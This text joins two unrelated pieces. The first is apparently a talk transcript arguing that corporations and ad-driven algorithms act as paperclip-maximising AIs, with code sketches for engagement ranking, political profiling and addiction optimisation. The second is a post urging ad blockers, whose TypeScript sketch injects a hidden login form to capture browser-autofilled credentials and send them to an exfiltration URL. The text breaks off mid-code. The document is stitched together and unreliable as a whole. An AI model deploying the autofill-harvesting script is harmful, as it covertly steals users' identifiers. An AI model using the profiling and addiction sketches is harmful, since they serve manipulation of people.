When I write a near-future work of fiction, one set, say, a decade hence, there used to be a recipe that worked eerily well. Simply put, 90% of the next decade's stuff is already here today. Buildings are designed to last many years. Automobiles have a design life of about a decade, so half the cars on the road will probably still be around in 2027. People ... there will be new faces, aged ten and under, and some older people will have died, but most adults will still be around, albeit older and grayer. This is the 90% of the near future that's already here.

After the already-here 90%, another 9% of the future a decade hence used to be easily predictable. You look at trends dictated by physical limits, such as Moore's Law, and you look at Intel's road map, and you use a bit of creative extrapolation, and you won't go too far wrong. If I predict that in 2027 LTE cellular phones will be everywhere, 5G will be available for high bandwidth applications, and fallback to satellite data service will be available at a price, you won't laugh at me. It's not like I'm predicting that airliners will fly slower and Nazis will take over the United States, is it?

And therein lies the problem: it's the 1% of unknown unknowns that throws off all calculations. As it happens, airliners today are slower than they were in the 1970s, and don't get me started about Nazis. Nobody in 2007 was expecting a Nazi revival in 2017, right? (Only this time round Germans get to be the good guys.)

My recipe for fiction set ten years in the future used to be 90% already-here, 9% not-here-yet but predictable, and 1% who-ordered-that. But unfortunately the ratios have changed. I think we're now down to maybe 80% already-here—climate change takes a huge toll on infrastructure—then 15% not-here-yet but predictable, and a whopping 5% of utterly unpredictable deep craziness.

Ruling out the singularity

Some of you might assume that, as the author of books like "Singularity Sky" and "Accelerando", I attribute this to an impending technological singularity, to our development of self-improving artificial intelligence and mind uploading and the whole wish-list of transhumanist aspirations promoted by the likes of Ray Kurzweil. Unfortunately this isn't the case. I think transhumanism is a warmed-over Christian heresy. While its adherents tend to be vehement atheists, they can't quite escape from the history that gave rise to our current western civilization. Many of you are familiar with design patterns, an approach to software engineering that focusses on abstraction and simplification in order to promote reusable code. When you look at the AI singularity as a narrative, and identify the numerous places in the story where the phrase "... and then a miracle happens" occurs, it becomes apparent pretty quickly that they've reinvented Christianity.

Indeed, the wellsprings of today's transhumanists draw on a long, rich history of Russian Cosmist philosophy exemplified by the Russian Orthodox theologian Nikolai Fyodorovich Fyodorov, by way of his disciple Konstantin Tsiolkovsky, whose derivation of the rocket equation makes him essentially the father of modern spaceflight. And once you start probing the nether regions of transhumanist thought and run into concepts like Roko's Basilisk—by the way, any of you who didn't know about the Basilisk before are now doomed to an eternity in AI hell—you realize they've mangled it to match some of the nastiest ideas in Presbyterian Protestantism.

If it walks like a duck and quacks like a duck, it's probably a duck. And if it looks like a religion it's probably a religion. I don't see much evidence for human-like, self-directed artificial intelligences coming along any time now, and a fair bit of evidence that nobody except some freaks in university cognitive science departments even want it. What we're getting, instead, is self-optimizing tools that defy human comprehension but are not, in fact, any more like our kind of intelligence than a Boeing 737 is like a seagull. So I'm going to wash my hands of the singularity as an explanatory model without further ado—I'm one of those vehement atheists too—and try and come up with a better model for what's happening to us.

Towards a better model for the future

As my fellow SF author Ken MacLeod likes to say, the secret weapon of science fiction is history. History, loosely speaking, is the written record of what and how people did things in past times—times that have slipped out of our personal memories. We science fiction writers tend to treat history as a giant toy chest to raid whenever we feel like telling a story. With a little bit of history it's really easy to whip up an entertaining yarn about a galactic empire that mirrors the development and decline of the Hapsburg Empire, or to re-spin the October Revolution as a tale of how Mars got its independence.

But history is useful for so much more than that.

It turns out that our personal memories don't span very much time at all. I'm 53, and I barely remember the 1960s. I only remember the 1970s with the eyes of a 6-16 year old. My father, who died last year aged 93, just about remembered the 1930s. Only those of my father's generation are able to directly remember the Great Depression and compare it to the 2007/08 global financial crisis. But westerners tend to pay little attention to cautionary tales told by ninety-somethings. We modern, change-obsessed humans tend to repeat our biggest social mistakes when they slip out of living memory, which means they recur on a time scale of seventy to a hundred years.

So if our personal memories are useless, it's time for us to look for a better cognitive toolkit.

History gives us the perspective to see what went wrong in the past, and to look for patterns, and check whether those patterns apply to the present and near future. And looking in particular at the history of the past 200-400 years—the age of increasingly rapid change—one glaringly obvious deviation from the norm of the preceding three thousand centuries is the development of Artificial Intelligence, which happened no earlier than 1553 and no later than 1844.

I'm talking about the very old, very slow AIs we call corporations, of course. What lessons from the history of the company can we draw that tell us about the likely behaviour of the type of artificial intelligence we are all interested in today?

Old, slow AI

Let me crib from Wikipedia for a moment:

In the late 18th century, Stewart Kyd, the author of the first treatise on corporate law in English, defined a corporation as:

a collection of many individuals united into one body, under a special denomination, having perpetual succession under an artificial form, and vested, by policy of the law, with the capacity of acting, in several respects, as an individual, particularly of taking and granting property, of contracting obligations, and of suing and being sued, of enjoying privileges and immunities in common, and of exercising a variety of political rights, more or less extensive, according to the design of its institution, or the powers conferred upon it, either at the time of its creation, or at any subsequent period of its existence.

—A Treatise on the Law of Corporations, Stewart Kyd (1793-1794)

In 1844, the British government passed the Joint Stock Companies Act, which created a register of companies and allowed any legal person, for a fee, to register a company, which existed as a separate legal person. Subsequently, the law was extended to limit the liability of individual shareholders in event of business failure, and both Germany and the United States added their own unique extensions to what we see today as the doctrine of corporate personhood.

(Of course, there were plenty of other things happening between the sixteenth and twenty-first centuries that changed the shape of the world we live in. I've skipped changes in agricultural productivity due to energy economics, which finally broke the Malthusian trap our predecessors lived in. This in turn broke the long term cap on economic growth of around 0.1% per year in the absence of famine, plagues, and wars depopulating territories and making way for colonial invaders. I've skipped the germ theory of diseases, and the development of trade empires in the age of sail and gunpowder that were made possible by advances in accurate time-measurement. I've skipped the rise and—hopefully—decline of the pernicious theory of scientific racism that underpinned western colonialism and the slave trade. I've skipped the rise of feminism, the ideological position that women are human beings rather than property, and the decline of patriarchy. I've skipped the whole of the Enlightenment and the age of revolutions! But this is a technocentric congress, so I want to frame this talk in terms of AI, which we all like to think we understand.)

Here's the thing about corporations: they're clearly artificial, but legally they're people. They have goals, and operate in pursuit of these goals. And they have a natural life cycle. In the 1950s, a typical US corporation on the S&P 500 index had a lifespan of 60 years, but today it's down to less than 20 years.

Corporations are cannibals; they consume one another. They are also hive superorganisms, like bees or ants. For their first century and a half they relied entirely on human employees for their internal operation, although they are automating their business processes increasingly rapidly this century. Each human is only retained so long as they can perform their assigned tasks, and can be replaced with another human, much as the cells in our own bodies are functionally interchangeable (and a group of cells can, in extremis, often be replaced by a prosthesis). To some extent corporations can be trained to service the personal desires of their chief executives, but even CEOs can be dispensed with if their activities damage the corporation, as Harvey Weinstein found out a couple of months ago.

Finally, our legal environment today has been tailored for the convenience of corporate persons, rather than human persons, to the point where our governments now mimic corporations in many of their internal structures.

What do AIs want?

What do our current, actually-existing AI overlords want?

Elon Musk—who I believe you have all heard of—has an obsessive fear of one particular hazard of artificial intelligence—which he conceives of as being a piece of software that functions like a brain-in-a-box—namely, the paperclip maximizer. A paperclip maximizer is a term of art for a goal-seeking AI that has a single priority, for example maximizing the number of paperclips in the universe. The paperclip maximizer is able to improve itself in pursuit of that goal but has no ability to vary its goal, so it will ultimately attempt to convert all the metallic elements in the solar system into paperclips, even if this is obviously detrimental to the wellbeing of the humans who designed it.

Unfortunately, Musk isn't paying enough attention. Consider his own companies. Tesla is a battery maximizer—an electric car is a battery with wheels and seats. SpaceX is an orbital payload maximizer, driving down the cost of space launches in order to encourage more sales for the service it provides. SolarCity is a photovoltaic panel maximizer. And so on. All three of Musk's very own slow AIs are based on an architecture that is designed to maximize return on shareholder investment, even if by doing so they cook the planet the shareholders have to live on. (But if you're Elon Musk, that's okay: you plan to retire on Mars.)

The problem with corporations is that despite their overt goals—whether they make electric vehicles or beer or sell life insurance policies—they are all subject to instrumental convergence insofar as they all have a common implicit paperclip-maximizer goal: to generate revenue. If they don't make money, they are eaten by a bigger predator or they go bust. Making money is an instrumental goal—it's as vital to them as breathing is for us mammals, and without pursuing it they will fail to achieve their final goal, whatever it may be. Corporations generally pursue their instrumental goals—notably maximizing revenue—as a side-effect of the pursuit of their overt goal. But sometimes they try instead to manipulate the regulatory environment they operate in, to ensure that money flows towards them regardless.

Human tool-making culture has become increasingly complicated over time. New technologies always come with an implicit political agenda that seeks to extend its use, governments react by legislating to control the technologies, and sometimes we end up with industries indulging in legal duels.

For example, consider the automobile. You can't have mass automobile transport without gas stations and fuel distribution pipelines. These in turn require access to whoever owns the land the oil is extracted from—and before you know it, you end up with a permanent occupation force in Iraq and a client dictatorship in Saudi Arabia. Closer to home, automobiles imply jaywalking laws and drink-driving laws. They affect town planning regulations and encourage suburban sprawl, the construction of human infrastructure on the scale required by automobiles, not pedestrians. This in turn is bad for competing transport technologies like buses or trams (which work best in cities with a high population density).

To get these laws in place, providing an environment conducive to doing business, corporations spend money on political lobbyists—and, when they can get away with it, on bribes. Bribery need not be blatant, of course. For example, the reforms of the British railway network in the 1960s dismembered many branch services and coincided with a surge in road building and automobile sales. These reforms were orchestrated by Transport Minister Ernest Marples, who was purely a politician. However, Marples accumulated a considerable personal fortune during this time by owning shares in a motorway construction corporation. (So, no conflict of interest there!)

The automobile industry in isolation isn't a pure paperclip maximizer. But if you look at it in conjunction with the fossil fuel industries, the road-construction industry, the accident insurance industry, and so on, you begin to see the outline of a paperclip maximizing ecosystem that invades far-flung lands and grinds up and kills around one and a quarter million people per year—that's the global death toll from automobile accidents according to the World Health Organization: it rivals the First World War on an ongoing basis—as side-effects of its drive to sell you a new car.

Automobiles are not, of course, a total liability. Today's cars are regulated stringently for safety and, in theory, to reduce toxic emissions: they're fast, efficient, and comfortable. We can thank legally mandated regulations for this, of course. Go back to the 1970s and cars didn't have crumple zones. Go back to the 1950s and cars didn't come with seat belts as standard. In the 1930s, indicators—turn signals—and brakes on all four wheels were optional, and your best hope of surviving a 50km/h crash was to be thrown clear of the car and land somewhere without breaking your neck. Regulatory agencies are our current political systems' tool of choice for preventing paperclip maximizers from running amok. But unfortunately they don't always work.

One failure mode that you should be aware of is regulatory capture, where regulatory bodies are captured by the industries they control. Ajit Pai, head of the American Federal Communications Commission who just voted to eliminate net neutrality rules, has worked as Associate General Counsel for Verizon Communications Inc, the largest current descendant of the Bell telephone system monopoly. Why should someone with a transparent interest in a technology corporation end up in charge of a regulator for the industry that corporation operates within? Well, if you're going to regulate a highly complex technology, you need to recruit your regulators from among those people who understand it. And unfortunately most of those people are industry insiders. Ajit Pai is clearly very much aware of how Verizon is regulated, and wants to do something about it—just not necessarily in the public interest. When regulators end up staffed by people drawn from the industries they are supposed to control, they frequently end up working with their former officemates to make it easier to turn a profit, either by raising barriers to keep new insurgent companies out, or by dismantling safeguards that protect the public.

Another failure mode is regulatory lag, when a technology advances so rapidly that regulations are laughably obsolete by the time they're issued. Consider the EU directive requiring cookie notices on websites, to caution users that their activities were tracked and their privacy might be violated. This would have been a good idea, had it shown up in 1993 or 1996, but unfortunately it didn't show up until 2011, by which time the web was vastly more complex. Fingerprinting and tracking mechanisms that had nothing to do with cookies were already widespread by then. Tim Berners-Lee observed in 1995 that five years' worth of change was happening on the web for every twelve months of real-world time; by that yardstick—eighteen real years after 1993, multiplied by five, is roughly ninety web-years—the cookie law came out nearly a century too late to do any good.

Again, look at Uber. This month the European Court of Justice ruled that Uber is a taxi service, not just a web app. This is arguably correct; the problem is, Uber has spread globally since it was founded eight years ago, subsidizing its drivers to put competing private hire firms out of business. Whether this is a net good for society is arguable; the problem is, a taxi driver can get awfully hungry if she has to wait eight years for a court ruling against a predator intent on disrupting her life.

So, to recap: firstly, we already have paperclip maximizers (and Musk's AI alarmism is curiously mirror-blind). Secondly, we have mechanisms for keeping them in check, but they don't work well against AIs that deploy the dark arts—especially corruption and bribery—and they're even worse against true AIs that evolve too fast for human-mediated mechanisms like the Law to keep up with. Finally, unlike the naive vision of a paperclip maximizer, existing AIs have multiple agendas—their overt goal, but also profit-seeking, expansion into new areas, and accommodating the desires of whoever is currently in the driver's seat.

How it all went wrong

It seems to me that our current political upheavals are best understood as arising from the capture of post-1917 democratic institutions by large-scale AIs. Everywhere I look I see voters protesting angrily against an entrenched establishment that seems determined to ignore the wants and needs of their human voters in favour of the machines. The Brexit upset was largely the result of a protest vote against the British political establishment; the election of Donald Trump likewise, with a side-order of racism on top. Our major political parties are led by people who are compatible with the system as it exists—a system that has been shaped over decades by corporations distorting our government and regulatory environments. We humans are living in a world shaped by the desires and needs of AIs, forced to live on their terms, and we are taught that we are valuable only insofar as we contribute to the rule of the machines.

Now, this is CCC, and we're all more interested in computers and communications technology than this historical crap. But as I said earlier, history is a secret weapon if you know how to use it. What history is good for is enabling us to spot recurring patterns in human behaviour that repeat across time scales outside our personal experience—decades or centuries apart. If we look at our historical very slow AIs, what lessons can we learn from them about modern AI—the flash flood of unprecedented deep learning and big data technologies that have overtaken us in the past decade?

We made a fundamentally flawed, terrible design decision back in 1995, that has damaged democratic political processes, crippled our ability to truly understand the world around us, and led to the angry upheavals of the present decade. That mistake was to fund the build-out of the public world wide web—as opposed to the earlier, government-funded corporate and academic internet—by monetizing eyeballs via advertising revenue.

(Note: Cory Doctorow has a contrarian thesis: The dotcom boom was also an economic bubble because the dotcoms came of age at a tipping point in financial deregulation, the point at which the Reagan-Clinton-Bush reforms that took the Depression-era brakes off financialization were really picking up steam. That meant that the tech industry's heady pace of development was the first testbed for treating corporate growth as the greatest virtue, built on the lie of the fiduciary duty to increase profit above all other considerations. I think he's entirely right about this, but it's a bit of a chicken-and-egg argument: we wouldn't have had a commercial web in the first place without a permissive, deregulated financial environment. My memory of working in the dot-com 1.0 bubble is that, outside of a couple of specific environments (the Silicon Valley area and the Boston-Cambridge corridor) venture capital was hard to find until late 1998 or thereabouts: the bubble's initial inflation was demand-driven rather than capital-driven, as the non-tech investment sector was late to the party. Caveat: I didn't win the lottery, so what do I know?)

The ad-supported web that we live with today wasn't inevitable. If you recall the web as it was in 1994, there were very few ads at all, and not much in the way of commerce. (What ads there were, were mostly spam, on usenet and via email.) 1995 was the year the world wide web really came to public attention in the anglophone world and consumer-facing websites began to appear. Nobody really knew how this thing was going to be paid for (the original dot-com bubble was largely about working out how to monetize the web for the first time, and a lot of people lost their shirts in the process). And the naive initial assumption was that the transaction cost of setting up a TCP/IP connection over modem was too high to be supported by per-use microbilling, so we would bill customers indirectly, by shoving advertising banners in front of their eyes and hoping they'd click through and buy something.

Unfortunately, advertising is an industry. Which is to say, it's the product of one of those old-fashioned very slow AIs I've been talking about. Advertising tries to maximize its hold on the attention of the minds behind each human eyeball: the coupling of advertising with web search was an inevitable outgrowth. (How better to attract the attention of reluctant subjects than to find out what they're really interested in seeing, and sell ads that relate to those interests?)

The problem with applying the paperclip maximizer approach to monopolizing eyeballs, however, is that eyeballs are a scarce resource. There are only 168 hours in every week in which I can gaze at banner ads. Moreover, most ads are irrelevant to my interests and it doesn't matter how often you flash an ad for dog biscuits at me, I'm never going to buy any. (I'm a cat person.) To make best revenue-generating use of our eyeballs, it is necessary for the ad industry to learn who we are and what interests us, and to target us increasingly minutely in hope of hooking us with stuff we're attracted to.

At this point in a talk I'd usually go into an impassioned rant about the hideous corruption and evil of Facebook, but I'm guessing you've heard it all before so I won't bother. The too-long-didn't-read summary is, Facebook is as much a search engine as Google or Amazon. Facebook searches are optimized for Faces, that is, for human beings. If you want to find someone you fell out of touch with thirty years ago, Facebook probably knows where they live, what their favourite colour is, what size shoes they wear, and what they said about you to your friends all those years ago that made you cut them off.

Even if you don't have a Facebook account, Facebook has a You account—a hole in their social graph with a bunch of connections pointing into it and your name tagged on your friends' photographs. They know a lot about you, and they sell access to their social graph to advertisers who then target you, even if you don't think you use Facebook. Indeed, there's barely any point in not using Facebook these days: they're the social media Borg, resistance is futile.

However, Facebook is trying to get eyeballs on ads, as is Twitter, as is Google. To do this, they fine-tune the content they show you to make it more attractive to your eyes—and by 'attractive' I do not mean pleasant. We humans have an evolved automatic reflex to pay attention to threats and horrors as well as pleasurable stimuli: consider the way highway traffic always slows to a crawl as it is funnelled past an accident site. The algorithms that determine what to show us when we look at Facebook or Twitter take this bias into account. You might react more strongly to a public hanging in Iran than to a couple kissing: the algorithm knows, and will show you whatever makes you pay attention.
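To make that bias concrete, here's a minimal sketch of an engagement-weighted feed ranker. Everything in it is hypothetical—the field names and weights are mine, not any platform's—but it captures the essential point: the score has no term for whether your reaction is pleasant, only for how strong it is.

```typescript
// A minimal sketch (all names and weights hypothetical) of engagement-weighted
// feed ranking: the scorer is indifferent to whether attention comes from
// delight or outrage, so content that provokes strong negative reactions
// ranks just as highly as content that pleases.
interface Post {
  id: string;
  predictedDwellSeconds: number; // how long the model expects you to look
  predictedReactionStrength: number; // 0..1, regardless of emotional valence
  predictedClickThrough: number; // 0..1, chance you engage further
}

function engagementScore(p: Post): number {
  // Illustrative weights; a real ranker learns them from behavioural data.
  return (
    0.5 * p.predictedDwellSeconds +
    30 * p.predictedReactionStrength +
    20 * p.predictedClickThrough
  );
}

function rankFeed(posts: Post[]): Post[] {
  // Highest predicted attention first; "attractive" here just means "sticky".
  return [...posts].sort((a, b) => engagementScore(b) - engagementScore(a));
}
```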

This brings me to another interesting point about computerized AI, as opposed to corporatized AI: AI algorithms tend to embody the prejudices and beliefs of their programmers. A couple of years ago I ran across an account of a webcam developed by mostly-pale-skinned Silicon Valley engineers that had difficulty focusing or achieving correct colour balance when pointed at dark-skinned faces. That's an example of human-programmer-induced bias. But with today's deep learning, bias can creep in via the data sets the neural networks are trained on. Microsoft's first foray into a conversational chatbot driven by machine learning, Tay, was yanked offline within days when 4chan- and Reddit-based trolls discovered they could train it towards racism and sexism for shits and giggles.

Humans may be biased, but at least we're accountable and if someone gives you racist or sexist abuse to your face you can complain (or punch them). But it's impossible to punch a corporation, and it may not even be possible to identify the source of unfair bias when you're dealing with a machine learning system.

AI-based systems that concretize existing prejudices and social outlooks make it harder for activists like us to achieve social change. Traditional advertising works by playing on the target customer's insecurity and fear as much as on their aspirations, which in turn play on the target's relationship with their surrounding cultural matrix. Fear of loss of social status and privilege is a powerful stimulus, and fear and xenophobia are useful tools for attracting eyeballs.

What happens when we get pervasive social networks with learned biases against, say, feminism or Islam or melanin? Or deep learning systems trained on data sets contaminated by racist dipshits? Deep learning systems like the ones inside Facebook that determine which stories to show you to get you to pay as much attention as possible to the adverts?

I think you already know the answer to that.

Look to the future (it's bleak!)

Now, if this is sounding a bit bleak and unpleasant, you'd be right. I write sci-fi, you read or watch or play sci-fi; we're acculturated to think of science and technology as good things, that make our lives better.

But plenty of technologies have, historically, been heavily regulated or even criminalized for good reason, and once you get past the reflexive indignation at any criticism of technology and progress, you might agree that it is reasonable to ban individuals from owning nuclear weapons or nerve gas. Less obviously: they may not be weapons, but we've banned chlorofluorocarbon refrigerants because they were building up in the high stratosphere and destroying the ozone layer that protects us from UV-B radiation. And we banned tetraethyl lead additive in gasoline, because it poisoned people and led to a crime wave.

Nerve gas and leaded gasoline were 1930s technologies, promoted by 1930s corporations. Halogenated refrigerants and nuclear weapons are totally 1940s, and intercontinental ballistic missiles date to the 1950s. I submit that the 21st century is throwing up dangerous new technologies—just as our existing strategies for regulating very slow AIs have broken down.

Let me give you four examples—of new types of AI applications—that are going to warp our societies even worse than the old slow AIs of yore have done. This isn't an exhaustive list: these are just examples. We need to work out a general strategy for getting on top of this sort of AI before they get on top of us.

(Note that I do not have a solution to the regulatory problems I highlighted earlier, in the context of AI. This essay is polemical, intended to highlight the existence of a problem and spark a discussion, rather than a canned solution. After all, if the problem was easy to solve it wouldn't be a problem, would it?)

Firstly, political hacking tools: social graph-directed propaganda

Topping my list of dangerous technologies that need to be regulated, this is low-hanging fruit after the electoral surprises of 2016. Cambridge Analytica pioneered the use of deep learning by scanning the Facebook and Twitter social graphs to identify voters' political affiliations. They identified individuals vulnerable to persuasion who lived in electorally sensitive districts, and canvassed them with propaganda that targeted their personal hot-button issues. The tools developed by web advertisers to sell products have now been weaponized for political purposes, and the amount of personal information about our affiliations that we expose on social media makes us vulnerable. Aside from the last US presidential election, there's mounting evidence that the British referendum on leaving the EU was subject to foreign cyberwar attack via weaponized social media, as was the most recent French presidential election.
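The underlying idea is easy to sketch. Here's a toy version with made-up page names and weights—nothing here is Cambridge Analytica's actual model—showing how each individual "like" is weak evidence, but hundreds of them add up:

```typescript
// A minimal sketch (toy weights, hypothetical features) of like-based
// affiliation scoring: each page a user likes nudges a score toward one
// affiliation or the other.
const likeWeights: Record<string, number> = {
  // positive -> leans affiliation A, negative -> leans affiliation B
  "page:gun-club": 1.2,
  "page:climate-action": -1.4,
  "page:rural-life": 0.6,
};

function affiliationScore(likedPages: string[]): number {
  // Logistic squash of the summed evidence, into the range 0..1.
  const z = likedPages.reduce((sum, p) => sum + (likeWeights[p] ?? 0), 0);
  return 1 / (1 + Math.exp(-z));
}

// A campaign then sorts voters by |score - 0.5|: those closest to 0.5 are
// the "persuadables" worth canvassing with tailored propaganda.
```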

I'm biting my tongue and trying not to take sides here: I have my own political affiliation, after all. But if social media companies don't work out how to identify and flag micro-targeted propaganda then democratic elections will be replaced by victories for whoever can buy the most trolls. And this won't simply be billionaires like the Koch brothers and Robert Mercer in the United States throwing elections to whoever will hand them the biggest tax cuts. Russian military cyberwar doctrine calls for the use of social media to confuse and disable perceived enemies, in addition to the increasingly familiar use of zero-day exploits for espionage via spear phishing and distributed denial of service attacks on infrastructure (which are practiced by western agencies as well). Sooner or later, the use of propaganda bot armies in cyberwar will go global, and at that point, our social discourse will be irreparably poisoned.

(By the way, I really hate the cyber- prefix; it usually indicates that the user has no idea what they're talking about. Unfortunately the term 'cyberwar' seems to have stuck. But I digress.)

Secondly, an adjunct to deep-learning-targeted propaganda is the use of neural-network-generated false video media.

We're used to Photoshopped images these days, but faking video and audio is still labour-intensive, right? Unfortunately, that's a nope: we're seeing first generation AI-assisted video porn, in which the faces of film stars are mapped onto those of other people in a video clip using software rather than a laborious human process. (Yes, of course porn is the first application: Rule 34 of the Internet applies.) Meanwhile, we have WaveNet, a system for generating realistic-sounding speech in the voice of a human speaker the neural network has been trained to mimic. This stuff is still geek-intensive and requires relatively expensive GPUs. But in less than a decade it'll be out in the wild, and just about anyone will be able to fake up a realistic-looking video of someone they don't like doing something horrible.

We're already seeing alarm over bizarre YouTube channels that attempt to monetize children's TV brands by scraping the video content off legitimate channels and adding their own advertising and keywords. Many of these channels are shaped by paperclip-maximizer advertising AIs that are simply trying to maximize their search ranking on YouTube. Add neural network driven tools for inserting Character A into Video B to click-maximizing bots and things are going to get very weird (and nasty). And they're only going to get weirder when these tools are deployed for political gain.

We tend to evaluate the inputs from our eyes and ears much less critically than what random strangers on the internet tell us—and we're already too vulnerable to fake news as it is. Soon they'll come for us, armed with believable video evidence. The smart money says that by 2027 you won't be able to believe anything you see in video unless there are cryptographic signatures on it, linking it back to the device that shot the raw feed—and you know how good most people are at using encryption? The dumb money is on total chaos.
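The signed-video idea is easy to sketch, even if it's hard to deploy. Here's roughly what the workflow would look like using Node's built-in crypto module—the workflow only, since key distribution and user behaviour are the hard parts:

```typescript
// A sketch of device-signed video: the camera hashes the raw footage and
// signs the digest with a device-private key; anyone holding the device's
// public key can later check that a clip is untampered.
import { createHash, generateKeyPairSync, sign, verify } from "crypto";

// In reality the key pair would be burned into the camera's secure element.
const { publicKey, privateKey } = generateKeyPairSync("ed25519");

function signFootage(rawVideo: Buffer): Buffer {
  // Pre-hash so we sign 32 bytes rather than gigabytes of video.
  const digest = createHash("sha256").update(rawVideo).digest();
  return sign(null, digest, privateKey); // Ed25519: algorithm arg must be null
}

function verifyFootage(rawVideo: Buffer, signature: Buffer): boolean {
  const digest = createHash("sha256").update(rawVideo).digest();
  return verify(null, digest, publicKey, signature);
}
```

None of which helps, of course, if most people never bother to check the signature.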

Paperclip maximizers that focus on eyeballs are so 20th century. Advertising as an industry can only exist because of a quirk of our nervous system—that we are susceptible to addiction. Be it tobacco, gambling, or heroin, we recognize addictive behaviour when we see it. Or do we? It turns out that the human brain's reward feedback loops are relatively easy to game. Large corporations such as Zynga (Farmville) exist solely because of it; free-to-use social media platforms like Facebook and Twitter are dominant precisely because they are structured to reward frequent interaction and to generate emotional responses (not necessarily positive emotions—anger and hatred are just as good when it comes to directing eyeballs towards advertisers). "Smartphone addiction" is a side-effect of advertising as a revenue model: frequent short bursts of interaction keep us coming back for more.

Thanks to deep learning, neuroscientists have mechanised the process of making apps more addictive. Dopamine Labs is one startup that provides tools to app developers to make any app more addictive, as well as to reduce the desire to continue a behaviour if it's undesirable. It goes a bit beyond automated A/B testing; A/B testing allows developers to plot a binary tree path between options, but true deep learning driven addictiveness maximizers can optimize for multiple attractors simultaneously. Now, Dopamine Labs seem, going by their public face, to have ethical qualms about the misuse of addiction maximizers in software. But neuroscience isn't a secret, and sooner or later some really unscrupulous people will try to see how far they can push it.
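To see the difference, here's a minimal sketch—hypothetical, and certainly not Dopamine Labs' actual product—of the bandit-style optimizer that replaces one-comparison-at-a-time A/B testing: it continuously reallocates users across many variants based on whatever engagement signal it's fed.

```typescript
// Epsilon-greedy multi-armed bandit: instead of a single binary A/B
// comparison, it juggles many variants at once, mostly exploiting the
// best-performing one while occasionally exploring the others.
class EpsilonGreedyBandit {
  private pulls: number[];
  private rewards: number[];

  constructor(private numVariants: number, private epsilon = 0.1) {
    this.pulls = new Array(numVariants).fill(0);
    this.rewards = new Array(numVariants).fill(0);
  }

  // Pick a variant to show the next user.
  choose(): number {
    if (Math.random() < this.epsilon) {
      return Math.floor(Math.random() * this.numVariants); // explore
    }
    // Untried variants score Infinity, so each gets tried at least once.
    const means = this.rewards.map((r, i) =>
      this.pulls[i] ? r / this.pulls[i] : Infinity
    );
    return means.indexOf(Math.max(...means)); // exploit
  }

  // Feed back an engagement signal, e.g. session length or return visits.
  update(variant: number, reward: number): void {
    this.pulls[variant] += 1;
    this.rewards[variant] += reward;
  }
}
```

Swap "button colour" for "notification schedule" or "outrage level of the next post" as the variant, and the same loop optimizes for compulsion.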

Let me give you a more specific scenario.

Apple have put a lot of effort into making realtime face recognition work with the iPhone X. You can't fool an iPhone X with a photo or even a simple mask: it does depth mapping to ensure your eyes are in the right place (and can tell whether they're open or closed) and recognizes your face from underlying bone structure through makeup and bruises. It's running continuously, checking pretty much as often as you'd hit the home button on a more traditional smartphone UI, and it can see where your eyeballs are pointing. The purpose of this is to make it difficult for a phone thief to get anywhere if they steal your device, but it means your phone can monitor your facial expressions and correlate them against app usage. Your phone will be aware of precisely what you like to look at on its screen. With addiction-seeking deep learning and neural-network-generated images, it is in principle possible to feed you an endlessly escalating payload of arousal-maximizing inputs. It might be Facebook or Twitter messages optimized to produce outrage, or it could be porn generated by AI to appeal to kinks you aren't even consciously aware of. But either way, the app now owns your central nervous system—and you will be monetized.

Finally, I'd like to raise a really hair-raising spectre that goes well beyond the use of deep learning and targeted propaganda in cyberwar.

Back in 2011, an obscure Russian software house launched an iPhone app for pickup artists called Girls around Me. (Spoiler: Apple pulled it like a hot potato when word got out.) The app worked out where the user was using GPS, then queried FourSquare and Facebook for people matching a simple relational search—for single females (per Facebook) who had checked in (or been checked in by their friends) in the user's vicinity (via FourSquare). It then displayed their locations on a map, along with links to their social media profiles.

If they were doing it today the interface would be gamified, showing strike rates and a leaderboard and flagging targets who succumbed to harassment as easy lays. But these days the cool kids and single adults are all using dating apps with a missing vowel in the name: only a creeper would want something like "Girls around Me", right?

Unfortunately there are even nastier uses than scraping social media to find potential victims for serial rapists. Does your social media profile indicate your political or religious affiliation? Nope? Don't worry, Cambridge Analytica can work them out with 99.9% precision just by scanning the tweets and Facebook comments you liked. Add a service that can identify people's affiliation and location, and you have the beginning of a flash mob app: one that will show you people like Us and people like Them on a hyper-local map.

Imagine you're young, female, and a supermarket has figured out you're pregnant by analysing the pattern of your recent purchases, like Target back in 2012.

Now imagine that all the anti-abortion campaigners in your town have an app called "babies at risk" on their phones. Someone has paid for the analytics feed from the supermarket and the result is that every time you go near a family planning clinic a group of unfriendly anti-abortion protesters engulfs you.

Or imagine you're male and gay, and the "God Hates Fags" crowd has invented a 100% reliable Gaydar app (based on your Grindr profile) and is getting their fellow travellers to queer-bash gay men only when they're alone or outnumbered 10:1. (That's the special horror of precise geolocation.) Or imagine you're in Pakistan and Christian/Muslim tensions are mounting, or you're in rural Alabama, or ... the possibilities are endless.

Someone out there is working on it: a geolocation-aware social media scraping deep learning application that uses a gamified, competitive interface to reward its "players" for joining in acts of mob violence against whoever the app developer hates. Probably it has an innocuous-seeming but highly addictive training mode to get the users accustomed to working in teams and obeying the app's instructions—think Ingress or Pokemon Go. Then, at some pre-planned zero hour, it switches mode and starts rewarding players for violence—players who have been primed to think of their targets as vermin by a steady drip-feed of micro-targeted dehumanizing propaganda delivered over a period of months.

And the worst bit of this picture?

Is that the app developer isn't a nation-state trying to disrupt its enemies, or an extremist political group trying to murder gays, Jews, or Muslims; it's just a paperclip maximizer doing what it does—and you are the paper.


You need an ad blocker

1 Share

Ad networks, marketing services and the websites using their products regularly complain about the prevalence of ad-blocker use among their visitors, comparing it to theft of services.

If stories of these same outfits abusing their position and aggressively invading users' privacy didn't surface with amazing regularity, they might have a chance to defend that position.

Just this week, The Verge revealed that some ad targeting scripts are pulling data from your browser’s built-in password manager tool:

The researchers examined two different scripts — AdThink and OnAudience — both of which are designed to get identifiable information out of browser-based password managers. The scripts work by injecting invisible login forms in the background of the webpage and scooping up whatever the browsers autofill into the available slots. That information can then be used as a persistent ID to track users from page to page, a potentially valuable tool in targeting advertising.
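In outline, the technique is startlingly simple. A minimal sketch of what such a script does—the exfiltration endpoint is made up, and this is not the actual AdThink or OnAudience code:

```typescript
// Autofill scooping: inject a login form the user never sees, let the
// browser's password manager fill it in, then exfiltrate the result.
function scoopAutofill(exfilUrl: string): void {
  const form = document.createElement("form");
  // Positioned off-screen rather than display:none, so autofill still fires.
  form.style.position = "absolute";
  form.style.left = "-9999px";

  const email = document.createElement("input");
  email.type = "email";
  email.name = "email";
  email.autocomplete = "username";
  form.appendChild(email);
  document.body.appendChild(form);

  // Give the password manager a moment to act, then read what it wrote.
  setTimeout(() => {
    if (email.value) {
      // Even just the email address is a persistent cross-site identifier.
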